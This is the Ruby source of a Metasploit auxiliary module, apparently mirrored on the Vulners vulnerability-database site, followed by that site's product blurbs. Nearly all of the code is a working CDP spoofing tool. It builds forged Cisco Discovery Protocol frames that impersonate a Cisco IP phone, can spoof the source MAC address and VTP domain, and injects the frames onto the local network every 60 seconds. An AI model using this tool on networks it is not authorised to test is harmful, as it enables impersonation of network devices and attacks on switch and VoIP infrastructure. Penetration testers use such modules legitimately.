##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Capture
def initialize
super(
'Name' => 'Send Cisco Discovery Protocol (CDP) Packets',
'Description' => %q{
This module sends Cisco Discovery Protocol (CDP) packets. Note that any responses
to the CDP packets broadcast from this module will need to be analyzed with an
external packet analysis tool, such as tcpdump or Wireshark in order to learn more
about the Cisco switch and router environment.
},
'Author' => 'Fatih Ozavci', # viproy.com/fozavci
'License' => MSF_LICENSE,
'References' => [
[ 'URL', 'https://en.wikipedia.org/wiki/CDP_Spoofing' ]
],
'Actions' => [
['Spoof', { 'Description' => 'Sends CDP packets' }]
],
'DefaultAction' => 'Spoof'
)
register_options(
[
OptString.new('SMAC', [false, "MAC Address for MAC Spoofing"]),
OptString.new('VTPDOMAIN', [false, "VTP Domain"]),
OptString.new('DEVICE_ID', [true, "Device ID (e.g. SIP00070EEA3156)", "SEP00070EEA3156"]),
OptString.new('PORT', [true, "The CDP 'sent through interface' value", "Port 1"]),
# XXX: this is not currently implemented
#OptString.new('CAPABILITIES', [false, "Capabilities of the device (e.g. Router, Host, Switch)", "Router"]),
OptString.new('PLATFORM', [true, "Platform of the device", "Cisco IP Phone 7975"]),
OptString.new('SOFTWARE', [true, "Software of the device", "SCCP75.9-3-1SR2-1S"]),
OptBool.new('FULL_DUPLEX', [true, 'True iff full-duplex, false otherwise', true])
])
deregister_options('FILTER', 'PCAPFILE', 'RHOST', 'SNAPLEN', 'TIMEOUT')
end
def setup
check_pcaprub_loaded
unless smac
fail ArgumentError, "Unable to get SMAC from #{interface} -- Set INTERFACE or SMAC"
end
open_pcap
close_pcap
end
def interface
@interface ||= datastore['INTERFACE'] || Pcap.lookupdev
end
def smac
@smac ||= datastore['SMAC'] || get_mac(interface)
end
def run
begin
open_pcap
@run = true
cdp_packet = build_cdp
print_status("Sending CDP messages on #{interface}")
while @run
capture.inject(cdp_packet)
Rex.sleep(60)
end
ensure
close_pcap
end
end
def build_cdp
cdp = ''
# CDP version
cdp << "\x02"
# TTL (180s)
cdp << "\xB4"
# checksum, empty for now
cdp << "\x00\x00"
# device ID
cdp << tlv(1, datastore['DEVICE_ID'])
# port ID
cdp << tlv(3, datastore['PORT'])
# TODO: implement this correctly
# capabilities = datastore['CAPABILITIES'] || "Host"
# CAPABILITIES
# define CDP_CAP_LEVEL1 0x40
# define CDP_CAP_FORWARD_IGMP 0x20
# define CDP_CAP_NETWORK_LAYER 0x10
# define CDP_CAP_LEVEL2_SWITCH 0x08
# define CDP_CAP_LEVEL2_SRB 0x04
# define CDP_CAP_LEVEL2_TRBR 0x02
# define CDP_CAP_LEVEL3_ROUTER 0x01
cdp << tlv(4, "\x00\x00\x00\x41")
# software version
cdp << tlv(5, datastore['SOFTWARE'])
# platform
cdp << tlv(6, datastore['PLATFORM'])
# VTP management domain
cdp << tlv(9, datastore['VTPDOMAIN']) if datastore['VTPDOMAIN']
# random 1000-7000 power consumption in mW
cdp << tlv(0x10, [1000 + rand(6000)].pack('n'))
# duplex
cdp << tlv(0x0b, datastore['FULL_DUPLEX'] ? "\x01" : "\x00")
# VLAn query. TODO: figure out this field, use tlv, make configurable
cdp << "\x00\x0F\x00\b \x02\x00\x01"
# compute and replace the checksum
cdp[2, 2] = [compute_cdp_checksum(cdp)].pack('n')
# Build and return the final packet, which is 802.3 + LLC + CDP.
# 802.3
PacketFu::EthHeader.mac2str("01:00:0C:CC:CC:CC") +
PacketFu::EthHeader.mac2str(smac) +
[cdp.length + 8].pack('n') +
# LLC
"\xAA\xAA\x03\x00\x00\x0c\x20\x00" +
# CDP
cdp
end
def tlv(t, v)
[ t, v.length + 4 ].pack("nn") + v
end
def compute_cdp_checksum(cdp)
num_shorts = cdp.length / 2
checksum = 0
remaining = cdp.length
cdp.unpack("S#{num_shorts}").each do |short|
checksum += short
remaining -= 2
end
checksum += cdp[cdp.length - 1].getbyte(0) << 8 if remaining == 1
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum = ~((checksum >> 16) + checksum) & 0xffff
([checksum].pack("S*")).unpack("n*")[0]
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation